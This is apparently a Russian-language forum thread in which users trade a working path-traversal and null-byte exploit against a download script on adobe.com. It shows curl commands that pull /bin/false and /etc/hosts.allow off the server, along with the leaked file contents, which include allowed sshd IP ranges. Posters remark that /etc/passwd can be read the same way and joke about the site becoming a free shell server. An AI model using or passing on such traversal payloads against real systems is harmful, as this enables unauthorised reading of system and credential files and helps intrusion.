Торможу. Пооткрывал разные файлы curl. Так не только с passwd можно.
Порадовало:
sikon@lucidfox:~$ curl http://www.adobe.com/shockwave/download/download.cgi?P1_Prod_Version=../../../.
./../../../../..//bin/false%00
#!/usr/bin/sh
# Copyright (c) 1984, 1986, 1987, 1988, 1989 AT&T
# All Rights Reserved
# THIS IS UNPUBLISHED PROPRIETARY SOURCE CODE OF AT&T
# The copyright notice above does not evidence any
# actual or intended publication of such source code.
#ident "@(#)false.sh 1.6 93/01/11 SMI" /* SVr4.0 1.3 */
exit 255
sikon@lucidfox:~$
|-----------------------------------------------------------------| | This system is for the use of authorized users only. | | Individuals using this computer system without authority, or in | | excess of their authority, are subject to having all of their | | activities on this system monitored and recorded by system | | personnel. | | | | In the course of monitoring individuals improperly using this | | system, or in the course of system maintenance, the activities | | of authorized users may also be monitored. | | | | Anyone using this system expressly consents to such monitoring | | and is advised that if such monitoring reveals possible | | evidence of criminal activity, system personnel may provide the | | evidence of such monitoring to law enforcement officials. | |-----------------------------------------------------------------|
доподлинно известно одно - кто-то в конце концов догадается посмотреть исходники самих скриптов и в конце-концов adobe.com превратится в прекрасный бесплатный шелл-сервер.
З.Ы. к слову, дырень эта по инету еще с 26 августа гуляет. Вот талпайопы :)))
Тоже прикольно
http://www.adobe.com/shockwave/download/download.cgi?P1_Prod_Version=../../../.
./../../../../..//etc//hosts.allow%00
# # Copyright (c) 2002 by Sun Microsystems, Inc. # All rights reserved. # #ident "@(#)hosts.allow 1.3 05/05/27 SMI" # # This file is supplied as part of the Solaris Security Toolkit and # is used to grant access to specific services as part of the Solaris 9 # TCP Wrappers implementation. This file should be customized based # on individual site needs. # ALL: LOCAL sshd: \ 130.248.0.0/255.255.0.0 \ 153.32.0.0/255.255.0.0 \ 10.0.0.0/255.0.0.0 \ 172.16.0.0/255.240.0.0 \ 192.168.0.0/255.255.0.0
Пару ссылок открыло, а теперь на все: "Site Area Temporarily Unavailable. We're sorry, the site area you've requested is unavailable due to scheduled maintenance. Please try again later."